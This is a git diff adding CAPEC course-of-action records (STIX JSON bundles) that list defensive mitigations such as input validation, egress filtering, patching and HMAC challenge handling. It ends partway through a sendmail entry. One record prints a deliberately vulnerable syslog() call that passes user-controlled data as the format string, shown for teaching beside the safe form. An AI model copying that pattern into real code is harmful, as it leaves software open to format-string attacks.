b/cti-ATT-CK-v13.1/capec/2.1/course-of-action/course-of-action--05cfe44e-6dc1-45e1-9005-1ae68cd3305e.json @@ -0,0 +1,20 @@ +{ + "id": "bundle--fd726d12-a644-4215-99c7-1c3bfddc3cd9", + "objects": [ + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "Configure your firewall to block egress ICMP messages.", + "id": "course-of-action--05cfe44e-6dc1-45e1-9005-1ae68cd3305e", + "modified": "2019-09-30T00:00:00.000Z", + "name": "coa-298-0", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "spec_version": "2.1", + "type": "course-of-action", + "x_capec_version": "3.9" + } + ], + "type": "bundle" +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/capec/2.1/course-of-action/course-of-action--06350ba3-c63f-43d3-85a9-3d4be370deba.json b/cti-ATT-CK-v13.1/capec/2.1/course-of-action/course-of-action--06350ba3-c63f-43d3-85a9-3d4be370deba.json new file mode 100644 index 0000000000000000000000000000000000000000..add3b13dbb24e888e287634b9abe3399e68f4abf --- /dev/null +++ b/cti-ATT-CK-v13.1/capec/2.1/course-of-action/course-of-action--06350ba3-c63f-43d3-85a9-3d4be370deba.json @@ -0,0 +1,20 @@ +{ + "id": "bundle--f93cb411-fd97-4812-8730-44f8c8acbab2", + "objects": [ + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "Implementation: Mail servers that perform strict validation may catch these attacks, because metacharacters are not allowed in many header variables such as dns names", + "id": "course-of-action--06350ba3-c63f-43d3-85a9-3d4be370deba", + "modified": "2022-09-29T00:00:00.000Z", + "name": "coa-41-2", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "spec_version": "2.1", + "type": "course-of-action", + "x_capec_version": "3.9" + } + ], + "type": "bundle" +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/capec/2.1/course-of-action/course-of-action--06e89ede-e243-47b4-9f02-1fd206dd5a5b.json b/cti-ATT-CK-v13.1/capec/2.1/course-of-action/course-of-action--06e89ede-e243-47b4-9f02-1fd206dd5a5b.json new file mode 100644 index 0000000000000000000000000000000000000000..e90cd720a5f54db747575d2daf64be7242f4642a --- /dev/null +++ b/cti-ATT-CK-v13.1/capec/2.1/course-of-action/course-of-action--06e89ede-e243-47b4-9f02-1fd206dd5a5b.json @@ -0,0 +1,20 @@ +{ + "id": "bundle--8e14037f-4f9a-4d84-bff1-b543f112481f", + "objects": [ + { + "created": "2015-11-09T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "Changes to registry entries in \"HKLM\\Software\\Microsoft\\Windows NT\\Winlogon\\Notify\" that do not correlate with known software, patch cycles, etc are suspicious. New DLLs written to System32 which do not correlate with known good software or patching may be suspicious.", + "id": "course-of-action--06e89ede-e243-47b4-9f02-1fd206dd5a5b", + "modified": "2023-01-24T00:00:00.000Z", + "name": "coa-579-0", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "spec_version": "2.1", + "type": "course-of-action", + "x_capec_version": "3.9" + } + ], + "type": "bundle" +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/capec/2.1/course-of-action/course-of-action--0702663e-005e-40fa-90d8-44404b86fd2c.json b/cti-ATT-CK-v13.1/capec/2.1/course-of-action/course-of-action--0702663e-005e-40fa-90d8-44404b86fd2c.json new file mode 100644 index 0000000000000000000000000000000000000000..d3474805b27903635008c2224c2ae804b001e6e6 --- /dev/null +++ b/cti-ATT-CK-v13.1/capec/2.1/course-of-action/course-of-action--0702663e-005e-40fa-90d8-44404b86fd2c.json @@ -0,0 +1,20 @@ +{ + "id": "bundle--7a7923a9-99ac-45f0-9a38-ea71a9c29e76", + "objects": [ + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "\n The code should be reviewed for misuse of the Syslog function call. Manual or automated code review can be used. The reviewer needs to ensure that all format string functions are passed a static string which cannot be controlled by the user and that the proper number of arguments are always sent to that function as well. If at all possible, do not use the %n operator in format strings. The following code shows a correct usage of Syslog():\n syslog(LOG_ERR, \"%s\", cmdBuf);\n The following code shows a vulnerable usage of Syslog():\n syslog(LOG_ERR, cmdBuf);\n // the buffer cmdBuff is taking user supplied data.\n \n \n ", + "id": "course-of-action--0702663e-005e-40fa-90d8-44404b86fd2c", + "modified": "2022-02-22T00:00:00.000Z", + "name": "coa-67-0", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "spec_version": "2.1", + "type": "course-of-action", + "x_capec_version": "3.7" + } + ], + "type": "bundle" +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/capec/2.1/course-of-action/course-of-action--076b471c-60c6-41a5-9266-e34cc546bfcd.json b/cti-ATT-CK-v13.1/capec/2.1/course-of-action/course-of-action--076b471c-60c6-41a5-9266-e34cc546bfcd.json new file mode 100644 index 0000000000000000000000000000000000000000..d4a065c0f8423a1ea847246068845a67b01a1da0 --- /dev/null +++ b/cti-ATT-CK-v13.1/capec/2.1/course-of-action/course-of-action--076b471c-60c6-41a5-9266-e34cc546bfcd.json @@ -0,0 +1,20 @@ +{ + "id": "bundle--782c74cc-89c9-4d26-b487-13893fee8228", + "objects": [ + { + "created": "2015-11-09T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "Strong physical security of all devices that contain secret key information. (even when devices are not in use)", + "id": "course-of-action--076b471c-60c6-41a5-9266-e34cc546bfcd", + "modified": "2018-07-31T00:00:00.000Z", + "name": "coa-622-1", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "spec_version": "2.1", + "type": "course-of-action", + "x_capec_version": "3.9" + } + ], + "type": "bundle" +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/capec/2.1/course-of-action/course-of-action--07b3e24d-8000-4c35-881d-2eaae3f2411e.json b/cti-ATT-CK-v13.1/capec/2.1/course-of-action/course-of-action--07b3e24d-8000-4c35-881d-2eaae3f2411e.json new file mode 100644 index 0000000000000000000000000000000000000000..0c2333f6cf4e709e8672a9eee552b70d29b1c083 --- /dev/null +++ b/cti-ATT-CK-v13.1/capec/2.1/course-of-action/course-of-action--07b3e24d-8000-4c35-881d-2eaae3f2411e.json @@ -0,0 +1,20 @@ +{ + "id": "bundle--0eeef219-2dce-4fc6-af8d-801492c01a95", + "objects": [ + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "If you have to use dangerous functions, make sure that you do boundary checking.", + "id": "course-of-action--07b3e24d-8000-4c35-881d-2eaae3f2411e", + "modified": "2021-10-21T00:00:00.000Z", + "name": "coa-100-2", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "spec_version": "2.1", + "type": "course-of-action", + "x_capec_version": "3.9" + } + ], + "type": "bundle" +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/capec/2.1/course-of-action/course-of-action--07cbed26-8c96-41e6-a239-7be587a38673.json b/cti-ATT-CK-v13.1/capec/2.1/course-of-action/course-of-action--07cbed26-8c96-41e6-a239-7be587a38673.json new file mode 100644 index 0000000000000000000000000000000000000000..974e570d35e0de933ab7c55f6ec4cd609d1c969e --- /dev/null +++ b/cti-ATT-CK-v13.1/capec/2.1/course-of-action/course-of-action--07cbed26-8c96-41e6-a239-7be587a38673.json @@ -0,0 +1,20 @@ +{ + "id": "bundle--5f8a95f1-d33c-4164-8753-e4e1c1cdea1d", + "objects": [ + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "Strong input validation - All user-controllable input must be validated and filtered for illegal characters as well as SQL content. Keywords such as UNION, SELECT or INSERT must be filtered in addition to characters such as a single-quote(') or SQL-comments (--) based on the context in which they appear.", + "id": "course-of-action--07cbed26-8c96-41e6-a239-7be587a38673", + "modified": "2022-02-22T00:00:00.000Z", + "name": "coa-66-0", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "spec_version": "2.1", + "type": "course-of-action", + "x_capec_version": "3.9" + } + ], + "type": "bundle" +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/capec/2.1/course-of-action/course-of-action--0878f5f1-911e-488a-8d4e-1f242b96933f.json b/cti-ATT-CK-v13.1/capec/2.1/course-of-action/course-of-action--0878f5f1-911e-488a-8d4e-1f242b96933f.json new file mode 100644 index 0000000000000000000000000000000000000000..a1706acfdde5fa6a596cb55d2326f3988a53dbb2 --- /dev/null +++ b/cti-ATT-CK-v13.1/capec/2.1/course-of-action/course-of-action--0878f5f1-911e-488a-8d4e-1f242b96933f.json @@ -0,0 +1,20 @@ +{ + "id": "bundle--6d0c03e4-bc30-4b7b-ae13-ad4be1357051", + "objects": [ + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "Enforce strict schema validation. The schema should enforce a maximum number of array elements. If the number of maximum array elements can't be limited another validation method should be used. One such method could be comparing the declared number of items in the array with the existing number of elements of the array. If these numbers don't match drop the SOAP packet at the web service layer.", + "id": "course-of-action--0878f5f1-911e-488a-8d4e-1f242b96933f", + "modified": "2019-09-30T00:00:00.000Z", + "name": "coa-493-0", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "spec_version": "2.1", + "type": "course-of-action", + "x_capec_version": "3.9" + } + ], + "type": "bundle" +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/capec/2.1/course-of-action/course-of-action--08a65d0b-e628-4d0b-8c91-ee3b1e9c215c.json b/cti-ATT-CK-v13.1/capec/2.1/course-of-action/course-of-action--08a65d0b-e628-4d0b-8c91-ee3b1e9c215c.json new file mode 100644 index 0000000000000000000000000000000000000000..cec2172b8fd7fcde81eea46976afe6824f6f4c3e --- /dev/null +++ b/cti-ATT-CK-v13.1/capec/2.1/course-of-action/course-of-action--08a65d0b-e628-4d0b-8c91-ee3b1e9c215c.json @@ -0,0 +1,20 @@ +{ + "id": "bundle--624a388a-5622-4b16-a686-5118db487f52", + "objects": [ + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "Implementation: Disallow the inclusion of DTDs as part of incoming messages.", + "id": "course-of-action--08a65d0b-e628-4d0b-8c91-ee3b1e9c215c", + "modified": "2020-12-17T00:00:00.000Z", + "name": "coa-228-1", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "spec_version": "2.1", + "type": "course-of-action", + "x_capec_version": "3.9" + } + ], + "type": "bundle" +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/capec/2.1/course-of-action/course-of-action--08e36a84-cc88-49b9-81f6-7dab06d12023.json b/cti-ATT-CK-v13.1/capec/2.1/course-of-action/course-of-action--08e36a84-cc88-49b9-81f6-7dab06d12023.json new file mode 100644 index 0000000000000000000000000000000000000000..f28de15433e020b327c7dcb4fdccb652a30e478f --- /dev/null +++ b/cti-ATT-CK-v13.1/capec/2.1/course-of-action/course-of-action--08e36a84-cc88-49b9-81f6-7dab06d12023.json @@ -0,0 +1,20 @@ +{ + "id": "bundle--445b68e5-baab-4f5a-963b-82961088a9ba", + "objects": [ + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "Use synchronization to control the flow of execution.", + "id": "course-of-action--08e36a84-cc88-49b9-81f6-7dab06d12023", + "modified": "2022-09-29T00:00:00.000Z", + "name": "coa-26-2", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "spec_version": "2.1", + "type": "course-of-action", + "x_capec_version": "3.9" + } + ], + "type": "bundle" +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/capec/2.1/course-of-action/course-of-action--08eae113-ec2a-445c-afca-ffe3b526e605.json b/cti-ATT-CK-v13.1/capec/2.1/course-of-action/course-of-action--08eae113-ec2a-445c-afca-ffe3b526e605.json new file mode 100644 index 0000000000000000000000000000000000000000..4a7c428cf985009b339884c2676ab505fbaeed1c --- /dev/null +++ b/cti-ATT-CK-v13.1/capec/2.1/course-of-action/course-of-action--08eae113-ec2a-445c-afca-ffe3b526e605.json @@ -0,0 +1,20 @@ +{ + "id": "bundle--dda89e00-07ce-4011-8046-d5e9378a2298", + "objects": [ + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "Make sure that all session tokens use a good source of randomness", + "id": "course-of-action--08eae113-ec2a-445c-afca-ffe3b526e605", + "modified": "2020-07-30T00:00:00.000Z", + "name": "coa-39-2", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "spec_version": "2.1", + "type": "course-of-action", + "x_capec_version": "3.9" + } + ], + "type": "bundle" +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/capec/2.1/course-of-action/course-of-action--094a4c09-e49c-422b-b8ec-b51c19dba18c.json b/cti-ATT-CK-v13.1/capec/2.1/course-of-action/course-of-action--094a4c09-e49c-422b-b8ec-b51c19dba18c.json new file mode 100644 index 0000000000000000000000000000000000000000..5a50c76d4d2869d05847db9996c1478d152a7d81 --- /dev/null +++ b/cti-ATT-CK-v13.1/capec/2.1/course-of-action/course-of-action--094a4c09-e49c-422b-b8ec-b51c19dba18c.json @@ -0,0 +1,20 @@ +{ + "id": "bundle--423da781-1184-4a7d-95c4-ab881cbdf395", + "objects": [ + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "Design: Use browser technologies that do not allow client side scripting.", + "id": "course-of-action--094a4c09-e49c-422b-b8ec-b51c19dba18c", + "modified": "2022-09-29T00:00:00.000Z", + "name": "coa-199-0", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "spec_version": "2.1", + "type": "course-of-action", + "x_capec_version": "3.9" + } + ], + "type": "bundle" +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/capec/2.1/course-of-action/course-of-action--098aadf6-648b-4c3a-bbf9-224e6bd430fd.json b/cti-ATT-CK-v13.1/capec/2.1/course-of-action/course-of-action--098aadf6-648b-4c3a-bbf9-224e6bd430fd.json new file mode 100644 index 0000000000000000000000000000000000000000..a74a9ec3c60537bcd8759893cc865c69597214e5 --- /dev/null +++ b/cti-ATT-CK-v13.1/capec/2.1/course-of-action/course-of-action--098aadf6-648b-4c3a-bbf9-224e6bd430fd.json @@ -0,0 +1,20 @@ +{ + "id": "bundle--e83b9e73-5a90-40e4-8bc8-84e24644bb72", + "objects": [ + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "Design: Build throttling mechanism into the resource allocation. Provide for a timeout mechanism for allocated resources whose transaction does not complete within a specified interval.", + "id": "course-of-action--098aadf6-648b-4c3a-bbf9-224e6bd430fd", + "modified": "2018-07-31T00:00:00.000Z", + "name": "coa-147-0", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "spec_version": "2.1", + "type": "course-of-action", + "x_capec_version": "3.9" + } + ], + "type": "bundle" +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/capec/2.1/course-of-action/course-of-action--0a399b26-688b-4a78-8d74-4d815dbc37ad.json b/cti-ATT-CK-v13.1/capec/2.1/course-of-action/course-of-action--0a399b26-688b-4a78-8d74-4d815dbc37ad.json new file mode 100644 index 0000000000000000000000000000000000000000..78718cf494b050b16ac2bcdca64202baf011fd89 --- /dev/null +++ b/cti-ATT-CK-v13.1/capec/2.1/course-of-action/course-of-action--0a399b26-688b-4a78-8d74-4d815dbc37ad.json @@ -0,0 +1,20 @@ +{ + "id": "bundle--3a37c5dd-6d87-427a-b561-179d0c3abde2", + "objects": [ + { + "created": "2017-01-04T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "Design: Include \"hosts file\"/IP address in the application", + "id": "course-of-action--0a399b26-688b-4a78-8d74-4d815dbc37ad", + "modified": "2023-01-24T00:00:00.000Z", + "name": "coa-598-1", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "spec_version": "2.1", + "type": "course-of-action", + "x_capec_version": "3.9" + } + ], + "type": "bundle" +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/capec/2.1/course-of-action/course-of-action--0a42ee9c-7f1e-494d-9924-1d1d6accfbe6.json b/cti-ATT-CK-v13.1/capec/2.1/course-of-action/course-of-action--0a42ee9c-7f1e-494d-9924-1d1d6accfbe6.json new file mode 100644 index 0000000000000000000000000000000000000000..7ae0679146b0749975edd6a7c08e96764978341c --- /dev/null +++ b/cti-ATT-CK-v13.1/capec/2.1/course-of-action/course-of-action--0a42ee9c-7f1e-494d-9924-1d1d6accfbe6.json @@ -0,0 +1,20 @@ +{ + "id": "bundle--3b182914-d1e8-4926-9f83-fcae45ff8c4e", + "objects": [ + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "Ensure all content that is delivered to client is sanitized against an acceptable content specification.", + "id": "course-of-action--0a42ee9c-7f1e-494d-9924-1d1d6accfbe6", + "modified": "2023-01-24T00:00:00.000Z", + "name": "coa-19-3", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "spec_version": "2.1", + "type": "course-of-action", + "x_capec_version": "3.9" + } + ], + "type": "bundle" +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/capec/2.1/course-of-action/course-of-action--0a849fd5-2365-44ad-b7db-fd394c0d1ec7.json b/cti-ATT-CK-v13.1/capec/2.1/course-of-action/course-of-action--0a849fd5-2365-44ad-b7db-fd394c0d1ec7.json new file mode 100644 index 0000000000000000000000000000000000000000..1b2323d8c7dc3eebb9a08101ff6111ee58560474 --- /dev/null +++ b/cti-ATT-CK-v13.1/capec/2.1/course-of-action/course-of-action--0a849fd5-2365-44ad-b7db-fd394c0d1ec7.json @@ -0,0 +1,20 @@ +{ + "id": "bundle--ea992934-99f2-40ff-ba85-8960d32068b0", + "objects": [ + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "Input should be encoded prior to use in commands to make sure command related characters are not treated as part of the command. For example, quotation characters may need to be encoded so that the application does not treat the quotation as a delimiter.", + "id": "course-of-action--0a849fd5-2365-44ad-b7db-fd394c0d1ec7", + "modified": "2020-12-17T00:00:00.000Z", + "name": "coa-248-1", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "spec_version": "2.1", + "type": "course-of-action", + "x_capec_version": "3.9" + } + ], + "type": "bundle" +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/capec/2.1/course-of-action/course-of-action--0b18ed90-3e15-4da1-8a4a-dab1030a5dc4.json b/cti-ATT-CK-v13.1/capec/2.1/course-of-action/course-of-action--0b18ed90-3e15-4da1-8a4a-dab1030a5dc4.json new file mode 100644 index 0000000000000000000000000000000000000000..e780d00d646bbcee241588190769ae89af65b0c2 --- /dev/null +++ b/cti-ATT-CK-v13.1/capec/2.1/course-of-action/course-of-action--0b18ed90-3e15-4da1-8a4a-dab1030a5dc4.json @@ -0,0 +1,20 @@ +{ + "id": "bundle--df55fcd4-34e6-45d7-a7b9-eae708c4cc88", + "objects": [ + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "Implementation: Normalize, filter and use an allowlist for any input that will be included in any subsequent web pages or back end operations.", + "id": "course-of-action--0b18ed90-3e15-4da1-8a4a-dab1030a5dc4", + "modified": "2022-02-22T00:00:00.000Z", + "name": "coa-247-1", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "spec_version": "2.1", + "type": "course-of-action", + "x_capec_version": "3.9" + } + ], + "type": "bundle" +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/capec/2.1/course-of-action/course-of-action--0b60f2ad-a597-4f6d-8433-af47d2743270.json b/cti-ATT-CK-v13.1/capec/2.1/course-of-action/course-of-action--0b60f2ad-a597-4f6d-8433-af47d2743270.json new file mode 100644 index 0000000000000000000000000000000000000000..ba59575531db1fd430bf09e4090b82fc459fd42f --- /dev/null +++ b/cti-ATT-CK-v13.1/capec/2.1/course-of-action/course-of-action--0b60f2ad-a597-4f6d-8433-af47d2743270.json @@ -0,0 +1,20 @@ +{ + "id": "bundle--d8fee43f-ef43-4a26-afc9-f68c19795862", + "objects": [ + { + "created": "2021-06-24T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "Conduct detailed vendor assessment before acquiring COTS hardware.", + "id": "course-of-action--0b60f2ad-a597-4f6d-8433-af47d2743270", + "modified": "2022-09-29T00:00:00.000Z", + "name": "coa-671-3", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "spec_version": "2.1", + "type": "course-of-action", + "x_capec_version": "3.9" + } + ], + "type": "bundle" +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/capec/2.1/course-of-action/course-of-action--0ba5f98c-6878-4132-908b-4b27bd6e56c3.json b/cti-ATT-CK-v13.1/capec/2.1/course-of-action/course-of-action--0ba5f98c-6878-4132-908b-4b27bd6e56c3.json new file mode 100644 index 0000000000000000000000000000000000000000..2b2017c09a8c7491bdfa30e0c02af69cff339bda --- /dev/null +++ b/cti-ATT-CK-v13.1/capec/2.1/course-of-action/course-of-action--0ba5f98c-6878-4132-908b-4b27bd6e56c3.json @@ -0,0 +1,20 @@ +{ + "id": "bundle--979aeccf-3784-4104-97d8-e3178dfaa666", + "objects": [ + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "Educate designers, developers, engineers, etc. on social engineering attacks to avoid downloading malicious software via attacks such as phishing attacks", + "id": "course-of-action--0ba5f98c-6878-4132-908b-4b27bd6e56c3", + "modified": "2022-09-29T00:00:00.000Z", + "name": "coa-537-3", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "spec_version": "2.1", + "type": "course-of-action", + "x_capec_version": "3.9" + } + ], + "type": "bundle" +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/capec/2.1/course-of-action/course-of-action--0bc589af-7ac3-4771-b1db-defb88ba61b5.json b/cti-ATT-CK-v13.1/capec/2.1/course-of-action/course-of-action--0bc589af-7ac3-4771-b1db-defb88ba61b5.json new file mode 100644 index 0000000000000000000000000000000000000000..6941f390ee9cbdd6cbf4ed79649e5fadca0f6cbf --- /dev/null +++ b/cti-ATT-CK-v13.1/capec/2.1/course-of-action/course-of-action--0bc589af-7ac3-4771-b1db-defb88ba61b5.json @@ -0,0 +1,20 @@ +{ + "id": "bundle--d70d0dc1-91f9-4902-b0b8-d1cbff8abf6e", + "objects": [ + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "Configuration: back-end HTTP agents reject ambiguous requests and close the network connection.", + "id": "course-of-action--0bc589af-7ac3-4771-b1db-defb88ba61b5", + "modified": "2022-09-29T00:00:00.000Z", + "name": "coa-105-2", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "spec_version": "2.1", + "type": "course-of-action", + "x_capec_version": "3.9" + } + ], + "type": "bundle" +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/capec/2.1/course-of-action/course-of-action--0bda0539-7bb3-4094-8f97-c0e908214b20.json b/cti-ATT-CK-v13.1/capec/2.1/course-of-action/course-of-action--0bda0539-7bb3-4094-8f97-c0e908214b20.json new file mode 100644 index 0000000000000000000000000000000000000000..30364eae528a72b2d2a3e54e4a823e85bf50a032 --- /dev/null +++ b/cti-ATT-CK-v13.1/capec/2.1/course-of-action/course-of-action--0bda0539-7bb3-4094-8f97-c0e908214b20.json @@ -0,0 +1,20 @@ +{ + "id": "bundle--dc689f9c-1e7b-4cf9-b9c5-9f2fd015d32e", + "objects": [ + { + "created": "2018-05-31T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "Make sure your web server is up-to-date with all patches to protect against known vulnerabilities.", + "id": "course-of-action--0bda0539-7bb3-4094-8f97-c0e908214b20", + "modified": "2020-12-17T00:00:00.000Z", + "name": "coa-650-0", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "spec_version": "2.1", + "type": "course-of-action", + "x_capec_version": "3.9" + } + ], + "type": "bundle" +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/capec/2.1/course-of-action/course-of-action--0c139321-7054-4d7b-92ff-f021b5ce6fc0.json b/cti-ATT-CK-v13.1/capec/2.1/course-of-action/course-of-action--0c139321-7054-4d7b-92ff-f021b5ce6fc0.json new file mode 100644 index 0000000000000000000000000000000000000000..9657ae652b76a3f5b5160e8d98a0b6f7ece8a57c --- /dev/null +++ b/cti-ATT-CK-v13.1/capec/2.1/course-of-action/course-of-action--0c139321-7054-4d7b-92ff-f021b5ce6fc0.json @@ -0,0 +1,20 @@ +{ + "id": "bundle--b63d540d-adfc-4a00-bc36-5581d93fb89e", + "objects": [ + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "The use of HMAC to hash the response from the server can also be used to thwart reflection. The server responds by returning its own challenge as well as hashing the client's challenge, its own challenge and the pre-shared secret. Requiring the client to respond with the HMAC of the two challenges ensures that only the possessor of a valid pre-shared secret can successfully hash in the two values.", + "id": "course-of-action--0c139321-7054-4d7b-92ff-f021b5ce6fc0", + "modified": "2021-10-21T00:00:00.000Z", + "name": "coa-90-1", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "spec_version": "2.1", + "type": "course-of-action", + "x_capec_version": "3.9" + } + ], + "type": "bundle" +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/capec/2.1/course-of-action/course-of-action--0c769b9e-b3fa-410a-b87b-ef79448b95b2.json b/cti-ATT-CK-v13.1/capec/2.1/course-of-action/course-of-action--0c769b9e-b3fa-410a-b87b-ef79448b95b2.json new file mode 100644 index 0000000000000000000000000000000000000000..3578dd1705381ddc95fdca4860063f0d0c8b0f1f --- /dev/null +++ b/cti-ATT-CK-v13.1/capec/2.1/course-of-action/course-of-action--0c769b9e-b3fa-410a-b87b-ef79448b95b2.json @@ -0,0 +1,20 @@ +{ + "id": "bundle--323f2a43-acb2-427e-90da-2779ece1f083", + "objects": [ + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "To mitigate this type of an attack, explicit intents should be used whenever sensitive data is being sent. An explicit intent is delivered to a specific application as declared within the intent, whereas the Android operating system determines who receives an implicit intent which could potentially be a malicious application. If an implicit intent must be used, then it should be assumed that the intent will be received by an unknown application and any response should be treated accordingly. Implicit intents should never be used for inter-application communication.", + "id": "course-of-action--0c769b9e-b3fa-410a-b87b-ef79448b95b2", + "modified": "2021-10-21T00:00:00.000Z", + "name": "coa-499-0", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "spec_version": "2.1", + "type": "course-of-action", + "x_capec_version": "3.9" + } + ], + "type": "bundle" +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/capec/2.1/course-of-action/course-of-action--0d0e8c85-a2de-43ee-aa5a-3fb5d75c14c8.json b/cti-ATT-CK-v13.1/capec/2.1/course-of-action/course-of-action--0d0e8c85-a2de-43ee-aa5a-3fb5d75c14c8.json new file mode 100644 index 0000000000000000000000000000000000000000..eb12b141e27a70c22b9cb947187b858fb48513c6 --- /dev/null +++ b/cti-ATT-CK-v13.1/capec/2.1/course-of-action/course-of-action--0d0e8c85-a2de-43ee-aa5a-3fb5d75c14c8.json @@ -0,0 +1,20 @@ +{ + "id": "bundle--b011af89-4e1a-47de-a2fc-f3c9fd26d565", + "objects": [ + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "\n Disable the 7 to 8 bit conversion. This can be done by removing the F=9 flag from all Mailer specifications in the sendmail.cf file.\n For example, a sendmail.cf file with these changes applied should look similar to (depending on your system and configuration):\n 